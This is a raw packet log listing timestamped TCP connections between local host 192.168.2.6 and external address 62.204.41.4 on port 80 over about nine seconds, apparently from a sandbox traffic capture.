Feb 7, 2023 20:01:36.537137985 CET	49888	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:36.538187981 CET	49889	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:36.600183964 CET	80	49888	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:36.600307941 CET	49888	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:36.601329088 CET	80	49889	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:36.601526022 CET	49889	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:36.602318048 CET	49889	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:36.665793896 CET	80	49889	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:36.667840004 CET	80	49889	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:36.667974949 CET	49889	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:36.782042980 CET	49889	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:36.782783031 CET	49890	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:36.844347954 CET	80	49889	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:36.844450951 CET	49889	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:36.845403910 CET	80	49890	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:36.845515013 CET	49890	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:36.846820116 CET	49890	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:36.909503937 CET	80	49890	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:36.911346912 CET	80	49890	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:36.911472082 CET	49890	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:37.033293009 CET	49890	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:37.033998966 CET	49891	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:37.096540928 CET	80	49891	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:37.096677065 CET	49891	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:37.096678972 CET	80	49890	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:37.096875906 CET	49890	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:37.097124100 CET	49891	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:37.158993959 CET	80	49891	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:37.162909031 CET	80	49891	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:37.165694952 CET	49891	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:37.280268908 CET	49891	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:37.281327009 CET	49892	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:37.343421936 CET	80	49891	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:37.343466043 CET	80	49892	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:37.343622923 CET	49891	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:37.343683958 CET	49892	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:37.344208002 CET	49892	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:37.405392885 CET	80	49892	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:37.409373045 CET	80	49892	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:37.412746906 CET	49892	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:37.538809061 CET	49892	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:37.539861917 CET	49893	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:37.599977016 CET	80	49892	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:37.600296974 CET	49892	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:37.602819920 CET	80	49893	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:37.603111982 CET	49893	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:37.604134083 CET	49893	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:37.667890072 CET	80	49893	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:37.669632912 CET	80	49893	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:37.669750929 CET	49893	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:37.779515982 CET	49893	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:37.780265093 CET	49894	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:37.841137886 CET	80	49894	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:37.842828989 CET	80	49893	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:37.843074083 CET	49893	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:37.843336105 CET	49894	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:37.843817949 CET	49894	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:37.906964064 CET	80	49894	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:37.907027960 CET	80	49894	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:37.907274961 CET	49894	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:38.015952110 CET	49894	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:38.017652988 CET	49895	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:38.076669931 CET	80	49894	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:38.076881886 CET	49894	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:38.079432011 CET	80	49895	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:38.079662085 CET	49895	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:38.089699984 CET	49895	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:38.153748989 CET	80	49895	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:38.155802011 CET	80	49895	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:38.155939102 CET	49895	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:38.264374971 CET	49895	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:38.268385887 CET	49896	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:38.325994015 CET	80	49895	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:38.326170921 CET	49895	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:38.330090046 CET	80	49896	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:38.330353022 CET	49896	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:38.330965996 CET	49896	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:38.392735958 CET	80	49896	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:38.395314932 CET	80	49896	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:38.395489931 CET	49896	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:38.498763084 CET	49896	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:38.499902964 CET	49897	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:38.560422897 CET	80	49896	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:38.560590029 CET	49896	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:38.561600924 CET	80	49897	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:38.561774015 CET	49897	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:38.564289093 CET	49897	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:38.625631094 CET	80	49897	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:38.627590895 CET	80	49897	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:38.627706051 CET	49897	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:38.747742891 CET	49897	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:38.748529911 CET	49898	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:38.809241056 CET	80	49897	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:38.809547901 CET	49897	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:38.809792042 CET	80	49898	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:38.809953928 CET	49898	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:38.811964989 CET	49898	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:38.873259068 CET	80	49898	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:38.875428915 CET	80	49898	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:38.875607014 CET	49898	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:39.058872938 CET	49898	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:39.060292959 CET	49899	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:39.120363951 CET	80	49898	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:39.120699883 CET	49898	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:39.121643066 CET	80	49899	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:39.121874094 CET	49899	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:39.123661041 CET	49899	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:39.185121059 CET	80	49899	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:39.189034939 CET	80	49899	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:39.189151049 CET	49899	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:39.294971943 CET	49899	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:39.296015024 CET	49900	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:39.356703997 CET	80	49899	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:39.356863976 CET	49899	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:39.358625889 CET	80	49900	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:39.358798027 CET	49900	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:39.360455036 CET	49900	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:39.422914982 CET	80	49900	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:39.425144911 CET	80	49900	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:39.425285101 CET	49900	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:39.549983025 CET	49900	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:39.551280022 CET	49901	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:39.611967087 CET	80	49901	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:39.612070084 CET	49901	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:39.612533092 CET	49901	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:39.612751007 CET	80	49900	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:39.612937927 CET	49900	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:39.673119068 CET	80	49901	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:39.675569057 CET	80	49901	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:39.675774097 CET	49901	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:39.794738054 CET	49901	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:39.795813084 CET	49902	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:39.855392933 CET	80	49901	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:39.855570078 CET	49901	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:39.857079029 CET	80	49902	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:39.857225895 CET	49902	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:39.857997894 CET	49902	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:39.919364929 CET	80	49902	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:39.921566963 CET	80	49902	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:39.924252987 CET	49902	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:40.034218073 CET	49902	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:40.035475969 CET	49903	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:40.095736027 CET	80	49902	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:40.096302986 CET	49902	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:40.096990108 CET	80	49903	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:40.097229004 CET	49903	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:40.097750902 CET	49903	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:40.159404039 CET	80	49903	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:40.163037062 CET	80	49903	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:40.166274071 CET	49903	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:40.279436111 CET	49903	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:40.280350924 CET	49904	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:40.341217041 CET	80	49903	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:40.341892004 CET	80	49904	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:40.342065096 CET	49903	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:40.342207909 CET	49904	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:40.346550941 CET	49904	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:40.408281088 CET	80	49904	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:40.410402060 CET	80	49904	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:40.410576105 CET	49904	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:40.514254093 CET	49904	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:40.527251959 CET	49905	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:40.575962067 CET	80	49904	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:40.577617884 CET	49904	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:40.589366913 CET	80	49905	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:40.589888096 CET	49905	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:40.596380949 CET	49905	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:40.658809900 CET	80	49905	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:40.660595894 CET	80	49905	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:40.660774946 CET	49905	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:40.784643888 CET	49905	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:40.785393000 CET	49906	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:40.846772909 CET	80	49905	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:40.846934080 CET	80	49906	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:40.847083092 CET	49905	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:40.847168922 CET	49906	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:40.847690105 CET	49906	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:40.909430981 CET	80	49906	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:40.911724091 CET	80	49906	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:40.912564993 CET	49906	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:41.030164957 CET	49906	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:41.031676054 CET	49907	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:41.091813087 CET	80	49906	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:41.091984987 CET	80	49907	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:41.092039108 CET	49906	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:41.092228889 CET	49907	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:41.092787027 CET	49907	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:41.153259993 CET	80	49907	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:41.156471968 CET	80	49907	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:41.156678915 CET	49907	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:41.264355898 CET	49907	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:41.265394926 CET	49908	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:41.324996948 CET	80	49907	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:41.325213909 CET	49907	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:41.326833963 CET	80	49908	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:41.327003956 CET	49908	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:41.349766970 CET	49908	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:41.411433935 CET	80	49908	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:41.413944960 CET	80	49908	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:41.414139986 CET	49908	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:41.532624960 CET	49908	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:41.534607887 CET	49909	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:41.595664024 CET	80	49908	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:41.595889091 CET	49908	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:41.596236944 CET	80	49909	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:41.596422911 CET	49909	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:41.612708092 CET	49909	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:41.674226999 CET	80	49909	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:41.676428080 CET	80	49909	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:41.676570892 CET	49909	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:41.780878067 CET	49909	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:41.781611919 CET	49910	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:41.842493057 CET	80	49909	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:41.842672110 CET	49909	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:41.843816996 CET	80	49910	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:41.843934059 CET	49910	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:41.844449043 CET	49910	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:41.906653881 CET	80	49910	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:41.908976078 CET	80	49910	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:41.909193039 CET	49910	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:42.030616045 CET	49910	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:42.031729937 CET	49911	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:42.093141079 CET	80	49911	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:42.093175888 CET	80	49910	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:42.093436956 CET	49910	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:42.093730927 CET	49911	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:42.093950033 CET	49911	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:42.155200958 CET	80	49911	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:42.158803940 CET	80	49911	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:42.158900976 CET	49911	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:42.264986992 CET	49911	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:42.266088009 CET	49912	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:42.326478004 CET	80	49912	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:42.326529980 CET	80	49911	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:42.326637030 CET	49912	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:42.326668024 CET	49911	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:42.328219891 CET	49912	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:42.388564110 CET	80	49912	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:42.390405893 CET	80	49912	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:42.390551090 CET	49912	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:42.499160051 CET	49912	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:42.500320911 CET	49913	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:42.559525013 CET	80	49912	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:42.559710979 CET	49912	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:42.561436892 CET	80	49913	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:42.561609030 CET	49913	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:42.565043926 CET	49913	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:42.626274109 CET	80	49913	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:42.628570080 CET	80	49913	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:42.628727913 CET	49913	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:42.736042023 CET	49913	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:42.737131119 CET	49914	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:42.797302961 CET	80	49913	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:42.797382116 CET	49913	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:42.799372911 CET	80	49914	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:42.799489021 CET	49914	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:42.801956892 CET	49914	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:42.864078999 CET	80	49914	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:42.866264105 CET	80	49914	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:42.866379023 CET	49914	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:42.994430065 CET	49914	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:42.995347023 CET	49915	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:43.055721998 CET	80	49915	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:43.055861950 CET	49915	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:43.056278944 CET	49915	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:43.056695938 CET	80	49914	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:43.056790113 CET	49914	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:43.116573095 CET	80	49915	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:43.119924068 CET	80	49915	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:43.120037079 CET	49915	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:43.232286930 CET	49915	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:43.233067989 CET	49916	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:43.292572021 CET	80	49916	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:43.292716980 CET	80	49915	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:43.292763948 CET	49916	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:43.292807102 CET	49915	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:43.294682980 CET	49916	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:43.357516050 CET	80	49916	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:43.357547045 CET	80	49916	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:43.357654095 CET	49916	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:43.474706888 CET	49916	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:43.476480961 CET	49917	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:43.534548998 CET	80	49916	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:43.534671068 CET	49916	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:43.537439108 CET	80	49917	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:43.537635088 CET	49917	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:43.562458038 CET	49917	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:43.623931885 CET	80	49917	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:43.626914024 CET	80	49917	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:43.627114058 CET	49917	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:43.739907980 CET	49917	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:43.740906000 CET	49918	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:43.800395966 CET	80	49917	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:43.800427914 CET	80	49918	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:43.800621986 CET	49917	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:43.800637007 CET	49918	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:43.801203966 CET	49918	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:43.861097097 CET	80	49918	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:43.862857103 CET	80	49918	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:43.862970114 CET	49918	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:44.007486105 CET	49918	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:44.008495092 CET	49919	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:44.069381952 CET	80	49918	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:44.070861101 CET	49918	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:44.075927973 CET	80	49919	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:44.079993963 CET	49919	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:44.090733051 CET	49919	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:44.155952930 CET	80	49919	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:44.158763885 CET	80	49919	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:44.162677050 CET	49919	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:44.595336914 CET	49919	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:44.596440077 CET	49920	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:44.656593084 CET	80	49920	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:44.657591105 CET	80	49919	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:44.657851934 CET	49919	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:44.659945965 CET	49920	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:44.690558910 CET	49920	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:44.750744104 CET	80	49920	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:44.752736092 CET	80	49920	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:44.752927065 CET	49920	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:44.949858904 CET	49920	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:44.951322079 CET	49921	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:45.010183096 CET	80	49920	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:45.011244059 CET	49920	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:45.011666059 CET	80	49921	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:45.012008905 CET	49921	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:45.051140070 CET	49921	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:45.111821890 CET	80	49921	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:45.115705013 CET	80	49921	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:45.115894079 CET	49921	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:45.260313988 CET	49921	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:45.261404991 CET	49922	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:45.321150064 CET	80	49921	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:45.321383953 CET	49921	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:45.322000027 CET	80	49922	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:45.322151899 CET	49922	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:45.348252058 CET	49922	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:45.408580065 CET	80	49922	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:45.411358118 CET	80	49922	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:45.411504984 CET	49922	80	192.168.2.6	62.204.41.4
